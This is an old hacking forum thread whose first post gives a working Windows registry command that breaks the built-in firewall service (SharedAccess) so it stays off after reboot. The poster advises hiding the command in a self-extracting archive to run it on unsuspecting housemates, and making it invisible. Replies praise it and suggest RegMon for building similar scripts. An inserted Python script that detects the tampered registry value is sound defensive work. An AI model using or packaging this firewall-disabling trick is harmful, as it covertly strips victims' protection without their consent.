Full Version: Knock Out The Icf
kbnet
Here's a little technique we put 2getha to hack our other housem8's. Build the following command into whatever you can - we built it into an SFX, probably one of the best techniques as people don't expect it most of the time.

cmd /c reg add HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess /v ImagePath /t REG_EXPAND_SZ /d C:\WINDOWS\System32\svchost.exe /f

Once they have extracted the SFX, the following command will run. On reboot their firewall will have been disabled, and you will notice that when you go into network settings and try and re-enable it, it cannot be done.

Obviously build it up with other commands, we have a lot better ones but don't want to reveal all the secrets in one go :-)

N.B. - u don't have to use 'cmd /c' at the beginning of the script, we just had to use it because of the way we are implementing this script. If u can, always use it without the cmd /c as it will be invisible, i.e. - no flash of the console.

KB & ChEz
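
Seen from the defending side, the change described in the post above leaves a recognisable trace: the SharedAccess ImagePath points at svchost.exe with no -k service group. The following is an added example, not part of the original thread, that audits `reg query` output for that condition across every control set; the sample output is constructed, and the expected group `netsvcs` and the name `audit_imagepath` are assumptions to confirm against a known-good host.

```python
import re

# Assumption: stock XP-era SharedAccess (ICF) runs in this svchost group;
# confirm against a known-good host before relying on it.
EXPECTED_GROUP = "netsvcs"

KEY_RE = re.compile(
    r"^HKEY_LOCAL_MACHINE\\SYSTEM\\(\w+)\\Services\\SharedAccess\s*$", re.I)
VAL_RE = re.compile(r"^\s+ImagePath\s+REG_\w+\s+(.+?)\s*$", re.I)
GROUP_RE = re.compile(r'svchost\.exe"?\s+-k\s+(\S+)', re.I)

# Constructed sample of `reg query` output for two control sets.
SAMPLE = r"""
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess
    ImagePath    REG_EXPAND_SZ    C:\WINDOWS\System32\svchost.exe

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\SharedAccess
    ImagePath    REG_EXPAND_SZ    %SystemRoot%\System32\svchost.exe -k netsvcs
"""

def audit_imagepath(reg_query_text):
    """Return (control_set, image_path, reason) for each suspect ImagePath."""
    findings, control_set = [], None
    for line in reg_query_text.splitlines():
        if line.upper().startswith("HKEY_"):
            # Track which control set we are in; ignore unrelated keys.
            m = KEY_RE.match(line)
            control_set = m.group(1) if m else None
            continue
        m = VAL_RE.match(line)
        if not (m and control_set):
            continue
        path = m.group(1)
        group = GROUP_RE.search(path)
        if "svchost.exe" not in path.lower():
            reason = "not hosted by svchost.exe"
        elif group is None:
            reason = "svchost.exe without -k group"
        elif group.group(1).lower() != EXPECTED_GROUP:
            reason = "unexpected service group"
        else:
            continue
        findings.append((control_set, path, reason))
    return findings

if __name__ == "__main__":
    for finding in audit_imagepath(SAMPLE):
        print(finding)
```
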
FLX
very nice kbnet as usual!
FLX
saetji
Wow gr8 find
kbnet
Best way to develop this kinda stuff is to get windows registry monitors, I use RegMon. This allows you to watch the registry in real time. So before I use any program and am looking for particular reg keys it accesses I kick off RegMon and look for the changes I am expecting, this allows us to develop scripts like the above. I don't know of any other programs that are 'better' than RegMon, but if people use a different prog and think it's good then please let me know.

Cheers
illusion6
not bad